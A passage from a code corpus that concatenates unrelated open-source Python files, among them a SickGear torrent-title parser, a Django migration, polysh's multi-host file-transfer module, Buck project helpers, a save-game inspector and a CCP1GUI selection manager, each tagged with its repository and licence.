date_re = r'(?i)([(\s.]*)((?:\d+[\s.]*(?:st|nd|rd|th)?[\s.])?)([adfjmnos]\w{2,}[\s.]+)((?:19|20)\d\d)([)\s.]*)'
dated = re.findall(date_re, title)
dnew = None
for d in dated:
try:
dout = parse(''.join(d[1:4])).strftime('%Y-%m-%d')
dnew = dout[0: not any(d[2]) and 4 or not any(d[1]) and 7 or len(dout)]
title = title.replace(''.join(d), '%s%s%s' % (('', ' ')[1 < len(d[0])], dnew, ('', ' ')[1 < len(d[4])]))
except (BaseException, Exception):
pass
if dated:
add_pad = re.findall(r'((?:19|20)\d\d[-]\d\d[-]\d\d)([\w\W])', title)
if any(add_pad) and add_pad[0][1] not in [' ', '.']:
title = title.replace(''.join(
add_pad[0]), '%s %s' % (add_pad[0][0], add_pad[0][1]))
title = re.sub(r'(?sim)(.*?)(?:Episode|Season).\d+.(.*)', r'\1\2', title)
t = ['']
bl = r'[*\[({]+\s*'
br = r'\s*[})\]*]+'
title = re.sub('(.*?)((?i)%sproper%s)(.*)' % (bl, br), r'\1\3\2', title)
for r in (r'\s+-\s+', r'(?:19|20)\d\d(?:\-\d\d\-\d\d)?', r'S\d\d+(?:E\d\d+)?'):
m = re.findall('(.*%s)(.*)' % r, title)
if any(m) and len(m[0][0]) > len(t[0]):
t = m[0]
t = ([title], t)[any(t)]
tags = [re.findall(x, t[-1], flags=re.X) for x in
('(?i)%sProper%s|\bProper\b$' % (bl, br),
r'(?i)(?:\d{3,4}(?:[pi]|hd)|hd(?:tv)?\s*\d{3,4}(?:[pi])?)',
'''
(?i)(hr.ws.pdtv|blu.?ray|hddvd|
pdtv|hdtv|dsr|tvrip|web.?(?:dl|rip)|dvd.?rip|b[r|d]rip|mpeg-?2)
''', '''
(?i)([hx].?26[45]|divx|xvid)
''', '''
(?i)(avi|mkv|mp4|sub(?:b?ed|pack|s))
''')]
title = ('%s`%s' % (
re.sub('|'.join(['|'.join([re.escape(y) for y in x]) for x in tags if x]).strip('|'), '', t[-1]),
re.sub(r'(?i)(?:hd(?:tv)?\s*)?(\d{3,4})(?:hd|p)?', r'\1p',
'`'.join(['`'.join(x) for x in tags[:-1]]).rstrip('`')) +
('', '`hdtv')[not any(tags[2])] + ('', '`x264')[not any(tags[3])]))
title = re.sub(r'([hx]26[45])p', r'\1', title)
for r in [(r'(?i)(?:\W(?:Series|Season))?\W(Repack)\W', r'`\1`'),
('(?i)%s(Proper)%s' % (bl, br), r'`\1`'), (r'%s\s*%s' % (bl, br), '`')]:
title = re.sub(r[0], r[1], title)
title = re.sub(r'[][]', '', title)
title = '%s%s-nogrp' % (('', t[0])[1 < len(t)], title)
for r in [(r'\s+[-]?\s+|\s+`|`\s+', '`'), ('`+', ' ')]:
title = re.sub(r[0], r[1], title)
titles = []
if dnew:
snew = None
dated_s = re.findall(date_re, search_string)
for d in dated_s:
try:
sout = parse(''.join(d[1:4])).strftime('%Y-%m-%d')
snew = sout[0: not any(d[2]) and 4 or not any(d[1]) and 7 or len(sout)]
except (BaseException, Exception):
pass
if snew and dnew and snew != dnew:
return titles
try:
sxxexx_r = r'(?i)S\d\d+E\d\d+'
if dnew and re.search(sxxexx_r, title):
titles += [re.sub(sxxexx_r, dnew, re.sub(r'[_.\-\s]?%s' % dnew, '', title))]
except (BaseException, Exception):
pass
titles += [title]
result = []
for cur_item in titles:
sxe_find = r'(?i)%s' % (sxe_build, r'S\d\d+E\d\d+|season\s*\d+')[not sxe_build]
sxe = re.findall(sxe_find, cur_item) or ''
if sxe:
sxe = sxe[0]
cur_item = re.sub(sxe, r'{{sxe}}', cur_item)
dated = dnew and re.findall(dnew, cur_item) or ''
if dated:
dated = dated[0]
cur_item = re.sub(dated, r'{{dated}}', cur_item)
parts = []
pre_post = re.findall(r'(.*?){{.*}}[.]*(.*)', cur_item)
item = re.sub(r'{{(sxe|dated)}}[.]*', '', cur_item)
end = [item]
if pre_post and (sxe or dated):
divider = ':'
tail = re.findall(r'(?i)^([^%s]+)(.*)' % divider, item)[0]
if tail[1]: # show name divider found
parts = [tail[0].strip()]
end = [tail[1].lstrip('%s ' % divider)]
else:
parts = [pre_post[0][0]]
end = [pre_post[0][1]]
parts += ([sxe], [])[not sxe] + ([dated], [])[not dated] + end
result += [re.sub(r'(\s\.|\.\s|\s+)', '.', ' '.join(parts))]
return result
@staticmethod
def regulate_cache_torrent_file(title):
return re.sub(r'\b(\s*subs)\b([\W\w]{0,20})$', r'\2', title)
def after_get_data(self, result):
if self.use_after_get_data:
try:
self.get_url(self.url_base + 'thanks/%s' % re.findall(r'download/(\d+)', result.url)[0])
except IndexError:
pass
def _season_strings(self, ep_obj, **kwargs):
return \
generic.TorrentProvider._season_strings(
self, ep_obj, scene=False, sp_detail=(
lambda e: [(('', 'Series %(seasonnumber)d ')[1 < try_int(e.get('seasonnumber'))]
+ '%(episodenumber)d of') % e, 'Series %(seasonnumber)d' % e]))
def _episode_strings(self, ep_obj, **kwargs):
return \
super(TVChaosUKProvider, self)._episode_strings(
ep_obj, scene=False, date_detail=(
lambda date: ['%s %s %s'.lstrip('0') % x for x in
[((d[-1], '%s' % m, y), (d, m, y)) + (((d, mf, y),), ())[m == mf]
for (d, m, mf, y) in [(date.strftime(x) for x in ('%d', '%b', '%B', '%Y'))]][0]]),
ep_detail=(lambda e: [naming_ep_type[2] % e] + (
[], ['%(episodenumber)d of' % e])[1 == try_int(e.get('seasonnumber'))]), **kwargs)
@staticmethod
def ui_string(key):
return ('tvchaosuk_tip' == key
and 'releases are often "Air by date release names" - edit search settings of show if required'
or 'tvchaosuk_use_after_get_data' == key and 'Send "Say thanks!"'
or 'tvchaosuk_use_after_get_data_tip' == key and 'to each release that is snatched'
or '')
provider = TVChaosUKProvider()
| SickGear/SickGear | sickbeard/providers/tvchaosuk.py | Python | gpl-3.0 | 15,109 |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-21 13:19
from __future__ import unicode_literals
import django.utils.timezone
from django.db import migrations, models
class Migration(migrations.Migration):
replaces = [
("wladmin", "0001_initial"),
("wladmin", "0002_auto_20180118_1020"),
("wladmin", "0003_auto_20180215_1127"),
]
initial = True
dependencies = []
operations = [
migrations.CreateModel(
name="ConfigurationError",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(max_length=150, unique=True)),
("message", models.TextField()),
("timestamp", models.DateTimeField(default=django.utils.timezone.now)),
("ignored", models.BooleanField(default=False)),
],
options={"ordering": ["-timestamp"]},
),
migrations.AlterIndexTogether(
name="configurationerror", index_together=set([("ignored", "timestamp")])
),
]
| dontnod/weblate | weblate/wladmin/migrations/0001_squashed_0003_auto_20180215_1127.py | Python | gpl-3.0 | 1,324 |
from data import Source
class OctetsToBitrate(Source):
def __init__(self, name, sources, intervals_average=1):
self.name = name
self.dependencies = sources
self.intervals_average = intervals_average
def set_interval(self, interval):
self.interval = interval
def run(self):
total = 0
for name in self.dependencies:
dataset = self.data.get_dataset(name)
try:
a = dataset.nth_latest_value(self.intervals_average + 1)
b = dataset.latest_value()
except IndexError:
a = 0
b = 0
# make sure the octets are already integers
a = int(a)
b = int(b)
# this happens on the first run
if a == 0 or b == 0:
pass
elif b < a: # difference between oldest two entries, modulo 16/32/64 (overflows)
# overflow happened
# guess the size of the counter
size = len(bin(a)) - 2
# round to the next multiple of 8
size = (size + 7) / 8 * 8
# rest to maxint(size)
rest = 2**size - a
a = 0
total = rest + b
else:
total += (b - a)
bitrate = (total * 8) / (self.interval * self.intervals_average)
self.data.add(self.name, bitrate)
class SimpleConversion(Source):
def __init__(self, name, source, func):
self.name = name
self.source = source
self.dependencies = [source]
self.func = func
def run(self):
dataset = self.data.get_dataset(self.source)
try:
value = dataset.latest_value()
except IndexError:
return
new = self.func(value)
self.data.add(self.name, new)
class Percentage(Source):
def __init__(self, name, value, maximum):
self.name = name
self.value = value
self.maximum = maximum
self.dependencies = [value]
def run(self):
val_dataset = self.data.get_dataset(self.value)
max_dataset = self.data.get_dataset(self.maximum)
try:
new = round(100.0 / max_dataset.latest_value() * val_dataset.latest_value(), 2)
except IndexError:
return
except ZeroDivisionError:
return
self.data.add(self.name, new)
class PerSecond(Source):
def __init__(self, name, sources):
self.name = name
self.dependencies = sources
def set_interval(self, interval):
self.interval = interval
def run(self):
total = 0
for name in self.dependencies:
dataset = self.data.get_dataset(name)
try:
a,b = dataset.two_latest_values()
except IndexError:
a = 0
b = 0
# make sure the octets are already integers
a = int(a)
b = int(b)
# this happens on the first run
if a == 0 or b == 0:
return
# difference between oldest two entries, modulo 16/32/64 (overflows)
if b < a:
# overflow happened
# FIXME
b = a # no, really. FIXME.
total += (b - a)
rate = total / self.interval
self.data.add(self.name, rate)
class Sum(Source):
def __init__(self, name, sources):
self.name = name
self.dependencies = sources
def run(self):
total = 0
for name in self.dependencies:
dataset = self.data.get_dataset(name)
l = int(dataset.latest_value())
total += l
self.data.add(self.name, total)
| Selfnet/dashboard | backend/dash/conversions.py | Python | bsd-2-clause | 3,791 |
from __future__ import print_function
import json
import os
import subprocess
import tempfile
import textwrap
import shutil
import sys
from buck_repo import check_output, which
from tracing import Tracing
def get_file_contents_if_exists(path, default=None):
with Tracing('BuckProject.get_file_contents_if_it_exists', args={'path': path}):
if not os.path.exists(path):
return default
with open(path) as f:
contents = f.read().strip()
return default if not contents else contents
def write_contents_to_file(path, contents):
with Tracing('BuckProject.write_contents_to_file', args={'path': path}):
with open(path, 'w') as output_file:
output_file.write(str(contents))
class BuckProject:
def __init__(self, root):
self.root = root
self._buck_out = os.path.join(root, "buck-out")
buck_out_tmp = os.path.join(self._buck_out, "tmp")
if not os.path.exists(buck_out_tmp):
os.makedirs(buck_out_tmp)
self._buck_out_log = os.path.join(self._buck_out, "log")
if not os.path.exists(self._buck_out_log):
os.makedirs(self._buck_out_log)
self.tmp_dir = tempfile.mkdtemp(prefix="buck_run.", dir=buck_out_tmp)
# Only created if buckd is used.
self.buckd_tmp_dir = None
self.buckd_dir = os.path.join(root, ".buckd")
self.autobuild_pid_file = os.path.join(self.buckd_dir, "autobuild.pid")
self.buckd_port_file = os.path.join(self.buckd_dir, "buckd.port")
self.buckd_run_count_file = (os.path.join(
self.buckd_dir, "buckd.runcount"))
self.buckd_version_file = os.path.join(self.buckd_dir, "buckd.version")
self.has_no_buck_check = (os.path.exists(os.path.join(
self.root, ".nobuckcheck")))
if self.has_no_buck_check:
print(textwrap.dedent("""\
:::
::: '.nobuckcheck' file is present. Not updating buck.
:::"""), file=sys.stderr)
buck_version_path = os.path.join(self.root, ".buckversion")
buck_version = get_file_contents_if_exists(buck_version_path)
self.buck_version = buck_version.split(':') if buck_version else None
buck_javaargs_path = os.path.join(self.root, ".buckjavaargs")
self.buck_javaargs = get_file_contents_if_exists(buck_javaargs_path)
def get_buckd_run_count(self):
return int(get_file_contents_if_exists(self.buckd_run_count_file, -1))
def get_running_buckd_version(self):
return get_file_contents_if_exists(self.buckd_version_file)
def get_autobuild_pid(self):
return get_file_contents_if_exists(self.autobuild_pid_file)
def get_buckd_port(self):
return get_file_contents_if_exists(self.buckd_port_file)
def get_buck_out_log_dir(self):
return self._buck_out_log
def update_buckd_run_count(self, new_run_count):
write_contents_to_file(self.buckd_run_count_file, new_run_count)
def clean_up_buckd(self):
with Tracing('BuckProject.clean_up_buckd'):
if os.path.exists(self.buckd_dir):
shutil.rmtree(self.buckd_dir)
if which('watchman'):
trigger_list_output = check_output(
['watchman', 'trigger-list', self.root])
trigger_list = json.loads(trigger_list_output)
if not trigger_list.get('triggers'):
subprocess.call(
['watchman', 'watch-del', self.root],
stdout=open(os.devnull, 'w'))
def create_buckd_tmp_dir(self):
tmp_dir_parent = os.path.join(self.buckd_dir, "tmp")
if not os.path.exists(tmp_dir_parent):
os.makedirs(tmp_dir_parent)
self.buckd_tmp_dir = tempfile.mkdtemp(prefix="buck_run.",
dir=tmp_dir_parent)
def save_buckd_port(self, port):
write_contents_to_file(self.buckd_port_file, port)
def save_buckd_version(self, version):
write_contents_to_file(self.buckd_version_file, version)
@staticmethod
def from_current_dir():
with Tracing('BuckProject.from_current_dir'):
current_dir = os.getcwd()
if '--version' in sys.argv or '-V' in sys.argv:
return BuckProject(current_dir)
while current_dir != os.sep:
if os.path.exists(os.path.join(current_dir, ".buckconfig")):
return BuckProject(current_dir)
current_dir = os.path.dirname(current_dir)
raise NoBuckConfigFoundException()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
with Tracing('BuckProject.__exit__'):
if os.path.exists(self.tmp_dir):
shutil.rmtree(self.tmp_dir)
class NoBuckConfigFoundException(Exception):
def __init__(self):
message = textwrap.dedent("""\
This does not appear to be the root of a Buck project. Please 'cd'
to the root of your project before running buck. If this really is
the root of your project, run
'touch .buckconfig'
and then re-run your buck command.""")
Exception.__init__(self, message)
| mread/buck | bin/buck_project.py | Python | apache-2.0 | 5,320 |
from django.db import models
from django.utils.translation import ugettext_lazy as _
from cms.models import CMSPlugin
# Feel free to extend this class instead of Contact.
from cmsplugin_contact import settings
class BaseContact(CMSPlugin):
SPAM_PROTECTION_CHOICES = (
(0, 'Honeypot'),
(1, 'Akismet'),
(2, 'ReCAPTCHA'),
)
THEME_CHOICES = (
('light', _('Light')),
('dark', _('Dark')),
)
SIZE_CHOICES = (
('normal', _('Normal')),
('compact', _('Compact')),
)
form_name = models.CharField(_('Form name'),
blank=True,
max_length=60,
help_text=_('Used to distinguish multiple contact forms on the same site.'))
form_layout = models.CharField(_('Form Layout'),
max_length=255,
help_text=_('Choose the layout of contact form'),
choices=settings.CMSPLUGIN_CONTACT_FORMS
)
site_email = models.EmailField(_('Email recipient'))
thanks = models.TextField(
verbose_name=_("Thanks message"),
help_text=_('Message displayed on successful submit'),
default=_('Thank you for your message.'), max_length=200)
submit_text = models.CharField(_('Submit button value'),
default=_('Submit'), max_length=30)
spam_protection_method = models.SmallIntegerField(
verbose_name=_('Spam protection method'),
choices=SPAM_PROTECTION_CHOICES, default=0)
akismet_api_key = models.CharField(max_length=255, blank=True)
recaptcha_public_key = models.CharField(max_length=255, blank=True)
recaptcha_private_key = models.CharField(max_length=255, blank=True)
recaptcha_theme = models.CharField(max_length=20,
choices=THEME_CHOICES,
default='light',
verbose_name=_('ReCAPTCHA theme'))
recaptcha_size = models.CharField(max_length=20,
choices=SIZE_CHOICES,
default='normal',
verbose_name=_('ReCAPTCHA size'))
redirect_url = models.URLField(_('URL Redirection'),
help_text=_('If it is set, the form redirect to url '
'when the form is valid'), blank=True)
class Meta:
abstract = True
def __unicode__(self):
return self.site_email
class Contact(BaseContact):
pass
| maccesch/cmsplugin-contact | cmsplugin_contact/models.py | Python | bsd-2-clause | 2,737 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# See the COPYING file for license information.
#
# Copyright (c) 2007 Guillaume Chazarain <guichaz@gmail.com>
import base64
import math
import os
import pipes
import random
import subprocess
import sys
import zipimport
from polysh import callbacks
from polysh import pity
from polysh.console import console_output
from polysh import remote_dispatcher
from polysh import dispatchers
def pity_dot_py_source():
path = pity.__file__
if not os.path.exists(path):
try:
zip_importer = zipimport.zipimporter(os.path.dirname(path))
except Exception:
return
return zip_importer.get_source('pity')
if not path.endswith('.py'):
# Read from the .py source file
dot_py_start = path.find('.py')
if dot_py_start >= 0:
path = path[:dot_py_start+3]
return file(path).read()
def base64version():
python_lines = []
for line in pity_dot_py_source().splitlines():
hash_pos = line.find('#')
if hash_pos >= 0:
line = line[:hash_pos]
line = line.rstrip()
if line:
python_lines.append(line)
python_source = '\n'.join(python_lines)
encoded = base64.encodestring(python_source).rstrip('\n').replace('\n', ',')
return encoded
def tarCreate(path):
if path:
path = path.rstrip('/') or '/'
else:
path = '.'
dirname = pipes.quote(os.path.dirname(path) or '.')
basename = pipes.quote(os.path.basename(path) or '/')
return 'tar c -C %s %s' % (dirname, basename)
BASE64_PITY_PY = base64version()
CMD_PREFIX = 'python -c "`echo "%s"|tr , \\\\\\n|openssl base64 -d`" ' % \
BASE64_PITY_PY
CMD_UPLOAD_EMIT = ('STTY_MODE="$(stty --save)";' +
'stty raw &> /dev/null;' +
'echo %s""%s;' +
CMD_PREFIX + ' %s upload %s;' +
'stty "$STTY_MODE"\n')
CMD_REPLICATE_EMIT = '%s | ' + CMD_PREFIX + ' %s replicate %s\n'
CMD_FORWARD = CMD_PREFIX + ' %s forward %s %s %s\n'
def tree_max_children(depth):
return 2 + depth/2
class file_transfer_tree_node(object):
def __init__(self,
parent,
dispatcher,
children_dispatchers,
depth,
should_print_bw,
path=None,
is_upload=False):
self.parent = parent
self.host_port = None
self.remote_dispatcher = dispatcher
self.children = []
if path:
self.path = path
self.is_upload = is_upload
num_children = min(len(children_dispatchers), tree_max_children(depth))
if num_children:
child_length = int(math.ceil(float(len(children_dispatchers)) /
num_children))
depth += 1
for i in xrange(num_children):
begin = i * child_length
if begin >= len(children_dispatchers):
break
child_dispatcher = children_dispatchers[begin]
end = begin + child_length
begin += 1
child = file_transfer_tree_node(self,
child_dispatcher,
children_dispatchers[begin:end],
depth,
should_print_bw)
self.children.append(child)
self.should_print_bw = should_print_bw(self)
self.try_start_pity()
def host_port_cb(self, host_port):
self.host_port = host_port
self.parent.try_start_pity()
def try_start_pity(self):
host_ports = [child.host_port for child in self.children]
if len(filter(bool, host_ports)) != len(host_ports):
return
host_ports = ' '.join(map(pipes.quote, host_ports))
if self.should_print_bw:
opt = '--print-bw'
else:
opt = ''
if self.parent:
cb = lambda host_port: self.host_port_cb(host_port)
t1, t2 = callbacks.add('file_transfer', cb, False)
cmd = CMD_FORWARD % (opt, t1, t2, host_ports)
elif self.is_upload:
def start_upload(unused):
local_uploader(self.path, self.remote_dispatcher)
t1, t2 = callbacks.add('upload_start', start_upload, False)
cmd = CMD_UPLOAD_EMIT % (t1, t2, opt, host_ports)
else:
cmd = CMD_REPLICATE_EMIT % (tarCreate(self.path), opt, host_ports)
self.remote_dispatcher.dispatch_command(cmd)
def __str__(self):
children_str = ''
for child in self.children:
child_str = str(child)
for line in child_str.splitlines():
children_str += '+--%s\n' % line
return '%s\n%s' % (self.remote_dispatcher.display_name, children_str)
def replicate(shell, path):
peers = [i for i in dispatchers.all_instances() if i.enabled]
if len(peers) <= 1:
console_output('No other remote shell to replicate files to\n')
return
def should_print_bw(node, already_chosen=[False]):
if not node.children and not already_chosen[0] and not node.is_upload:
already_chosen[0] = True
return True
return False
sender_index = peers.index(shell)
destinations = peers[:sender_index] + peers[sender_index+1:]
tree = file_transfer_tree_node(None,
shell,
destinations,
0,
should_print_bw,
path=path)
class local_uploader(remote_dispatcher.remote_dispatcher):
def __init__(self, path_to_upload, first_destination):
self.path_to_upload = path_to_upload
self.trigger1, self.trigger2 = callbacks.add('upload_done',
self.upload_done,
False)
self.first_destination = first_destination
self.first_destination.drain_and_block_writing()
remote_dispatcher.remote_dispatcher.__init__(self, '.')
self.temporary = True
def launch_ssh(self, name):
cmd = '%s | (openssl base64; echo %s) >&%d' % (
tarCreate(self.path_to_upload),
pity.BASE64_TERMINATOR,
self.first_destination.fd)
subprocess.call(cmd, shell=True)
os.write(1, self.trigger1 + self.trigger2 + '\n')
os._exit(0) # The atexit handler would kill all remote shells
def upload_done(self, unused):
self.first_destination.allow_writing()
def upload(local_path):
peers = [i for i in dispatchers.all_instances() if i.enabled]
if not peers:
console_output('No other remote shell to replicate files to\n')
return
if len(peers) == 1:
# We wouldn't be able to show the progress indicator with only one
# destination. We need one remote connection in blocking mode to send
# the base64 data to. We also need one remote connection in non blocking
# mode for polysh to display the progress indicator via the main select
# loop.
console_output('Uploading to only one remote shell is not supported, '
'use scp instead\n')
return
def should_print_bw(node, already_chosen=[False]):
if not node.children and not already_chosen[0]:
already_chosen[0] = True
return True
return False
tree = file_transfer_tree_node(None,
peers[0],
peers[1:],
0,
should_print_bw,
path=local_path,
is_upload=True)
| daniyalzade/polysh | polysh/file_transfer.py | Python | gpl-2.0 | 8,669 |
#!/usr/bin/env python3
from collections import defaultdict
from os.path import basename, join
import pprint
import extract
def readable_bytes(data: bytes) -> str:
return ' '.join(str(b).zfill(3) for b in data)
falloutformat = """{fname}
flags: {flags}
Flag 1
flag1data: {flag1data}
Flag 6
factionsize: {factionsize}
factions: {factions}
Flag 5
name: {name}
Flag 24
gender: {gender}
Flag 11
flag11unknown1: {flag11unknown1}
headpart1: {headpart1}
unknowncolor: {unknowncolor}
headpart2: {headpart2}
headpartcount: {headpartcount}
headparts: {headparts}
tetitendpresent: {tetitendpresent}
tetitendsize: {tetitendsize}
tetitend: {tetitend}
facesliderssize: {facesliderssize}
facesliders: {facesliders}
faceextrassize: {faceextrassize}
faceextras: {faceextras}
Flag 14
bodyunknowncount: {bodyunknowncount}
bodyunknown: {bodyunknown}
bodysliderthin: {bodysliderthin}
bodyslidermuscular: {bodyslidermuscular}
bodysliderlarge: {bodysliderlarge}
"""
def dump_file(fname, rawplayer, npc, achr):
with open(fname, 'rb') as f:
rawdata = f.read()
game, data = extract.parse_savedata(rawdata)
cfdata = extract.parse_changeforms(data['changeforms'])
if rawplayer:
with open(join('savedumps', basename(fname) + '.rawsavedump'), 'w') as f:
f.write('{}\n\n{}'.format(cfdata['playerchangeflags'],
readable_bytes(cfdata['playerdata'])))
return
player = extract.parse_player(cfdata['playerdata'],
cfdata['playerchangeflags'],
game)
if npc:
out = ''
if game == 'fallout4':
keys = defaultdict(str)
keys['fname'] = fname
keys['flags'] = cfdata['playerchangeflags']
keys.update({k:(readable_bytes(v) if isinstance(v, bytes) else v)
for k,v in player.items()})
out = falloutformat.format_map(keys)
with open(join('savedumps', basename(fname) + '.savedump'), 'w') as f:
f.write(out)
if achr:
cfdata2 = extract.parse_changeforms(data['changeforms'], refidnr=0x14)
with open(join('savedumps', basename(fname) + '.ACHRsavedump'), 'w') as f:
flags = cfdata2['playerchangeflags']
f.write('{}\n\n{}'.format(flags, readable_bytes(cfdata2['playerdata'])))
def dry_transfer(sourcefname, targetfname):
with open(sourcefname, 'rb') as f:
sourcerawdata = f.read()
with open(targetfname, 'rb') as f:
targetrawdata = f.read()
sourcegame, sourcedata = extract.parse_savedata(sourcerawdata)
targetgame, targetdata = extract.parse_savedata(targetrawdata)
# Get the player data from the source save
sourcecfdata = extract.parse_changeforms(sourcedata['changeforms'])
sourceplayer = extract.parse_player(sourcecfdata['playerdata'],
sourcecfdata['playerchangeflags'],
sourcegame)
# Get the data from target save
targetcfdata = extract.parse_changeforms(targetdata['changeforms'])
targetplayer = extract.parse_player(targetcfdata['playerdata'],
targetcfdata['playerchangeflags'],
targetgame)
# Merge players, return target player with source's face
newplayer, newflags = extract.merge_player(
sourceplayer, sourcecfdata['playerchangeflags'],
targetplayer, targetcfdata['playerchangeflags'],
sourcegame
)
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(newplayer)
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('files', nargs='+')
parser.add_argument('-n', '--npc', action='store_true')
parser.add_argument('-a', '--achr', action='store_true')
parser.add_argument('-p', '--raw-player', action='store_true')
parser.add_argument('-d', '--dry-transfer', action='store_true')
args = parser.parse_args()
if args.dry_transfer:
dry_transfer(args.files[0], args.files[1])
else:
for f in args.files:
dump_file(f, args.raw_player, args.npc, args.achr)
| nycz/SkyrimFaceTransfer | inspectsave.py | Python | gpl-3.0 | 4,220 |
from __future__ import absolute_import, unicode_literals
import re
from django.forms import RegexField
from .widgets import ColorFieldWidget
RGB_REGEX = re.compile('^#?((?:[0-F]{3}){1,2})$', re.IGNORECASE)
class RGBColorField(RegexField):
"""Form field for regular forms"""
widget = ColorFieldWidget
def __init__(self, **kwargs):
kwargs['regex'] = RGB_REGEX
super(RGBColorField, self).__init__(**kwargs)
| charettes/django-colorful | colorful/forms.py | Python | mit | 439 |
"""
Copyright 2015 Stefano Terna
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .settings import Settings | iottly/prettysettings | prettysettings/__init__.py | Python | apache-2.0 | 594 |
from .dialog import AddOnsDialog
| umlfri/umlfri2 | umlfri2/qtgui/appdialogs/addons/__init__.py | Python | gpl-3.0 | 33 |
#
# This file is part of the CCP1 Graphical User Interface (ccp1gui)
#
# (C) 2002-2005 CCLRC Daresbury Laboratory
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
# manage selections
#
# Rather inefficient, as it will probably
# re-image for each atom added/deleted
#
debug=0
class SelectionManager:
def __init__(self):
self.selected = []
self.add_funcs = []
self.rem_funcs = []
def add(self,mol,atoms):
for atom in atoms:
x = (mol,atom)
try:
t = self.selected.index(x)
except ValueError:
self.selected.append((mol,atom))
# perform all tasks dependent on the selection
for f in self.add_funcs:
f(mol,atoms)
def append(self,mol,atoms):
''' add but without checking'''
for atom in atoms:
self.selected.append((mol,atom))
# perform all tasks dependent on the selection
for f in self.add_funcs:
f(mol,atoms)
def rem(self,mol,atoms):
ra = []
for atom in atoms:
x = (mol,atom)
try:
self.selected.remove(x)
ra.append(atom)
except ValueError:
pass
for f in self.rem_funcs:
f(mol,ra)
def clear(self):
if debug: print 'clear selection'
for s in self.selected:
mol,atom = s
for f in self.rem_funcs:
f(mol,[atom])
self.selected = []
def toggle(self,mol,atoms):
if debug: print 'toggle'
aa = []
ra = []
for atom in atoms:
if debug: print 'tog',atom.get_index()
x = (mol,atom)
try:
self.selected.remove(x)
if debug: print 'rem'
ra.append(atom)
except ValueError:
self.selected.append(x)
if debug: print 'add'
aa.append(atom)
for f in self.rem_funcs:
f(mol,ra)
for f in self.add_funcs:
f(mol,aa)
def call_on_add(self,f):
self.add_funcs.append(f)
def call_on_rem(self,f):
self.rem_funcs.append(f)
def clean_deleted(self,mol):
''' Remove atoms from the selection if the atoms
are no longer part of the molecule'''
dead = []
for s in self.selected:
mol1,atom = s
if mol == mol1:
try:
test = mol.atom.index(atom)
except ValueError:
dead.append(s)
for d in dead:
self.selected.remove(d)
def get(self):
return self.selected
def get_centroid(self):
sel = self.selected
if not len(sel):
return
x=0.0;y=0.0;z=0.0;n=0
for mol,atom in sel:
x = x + atom.coord[0]
y = y + atom.coord[1]
z = z + atom.coord[2]
n=n+1
x = x / float(n)
y = y / float(n)
z = z / float(n)
return [x,y,z]
def printsel(self):
mols = []
for s in self.selected:
mol,atom = s
try:
test = mols.index(mol)
except ValueError:
mols.append(mol)
for mol in mols:
print mol.title
for a in self.get_by_mol(mol):
print a.get_index(),
print ""
def get_by_mol(self,mol):
result = []
for s in self.selected:
tmol,atom = s
if debug: print 'check',tmol.title, atom
if tmol == mol:
result.append(atom)
if debug:
print 'get_by_mol returned',len(result),'atoms'
return result
def get_mols(self):
mols = []
for s in self.selected:
tmol,atom = s
try:
t = mols.index(tmol)
except ValueError:
mols.append(tmol)
if debug:
print 'get_molsa returned',len(mols),mols
return mols
| alexei-matveev/ccp1gui | viewer/selections.py | Python | gpl-2.0 | 4,789 |
# -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
#
# Copyright (c) 2016 Cédric Clerget - HPC Center of Franche-Comté University
#
# This file is part of Janua-SMS
#
# http://github.com/mesocentrefc/Janua-SMS
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import os
import re
from socket import getdefaulttimeout
import smtplib
from string import Template as STemplate
from mailem.connection import SMTPConnection
from mailem import Message, Postman
from mailem.template import Template
from mailem.template.renderer import IRenderer
class UnicodePythonTemplateRenderer(IRenderer):
""" Simple Python Template renderer.
Supported substitutions:
* PythonTemplateRenderer('$what')(what=1) #-> '1'
* PythonTemplateRenderer('${what}')(what=1) #-> '1'
* PythonTemplateRenderer('$$what')(what=1) #-> '$what'
"""
def __init__(self, template):
self.template = STemplate(unicode(template, 'utf-8'))
def __call__(self, values):
return self.template.substitute(values)
class MailError(Exception):
"""Mail error exception"""
pass
class ESMTPConnection(SMTPConnection):
def __init__(self, host, port, username, password, local_hostname=None, ssl=False, tls=False, timeout=getdefaulttimeout()):
self.host = host
self.port = port
self.username = username
self.password = password
self.local_hostname = local_hostname
self.ssl = ssl
self.tls = tls
self.timeout = timeout
self.client = None
def connect(self):
# Init
s = (smtplib.SMTP_SSL
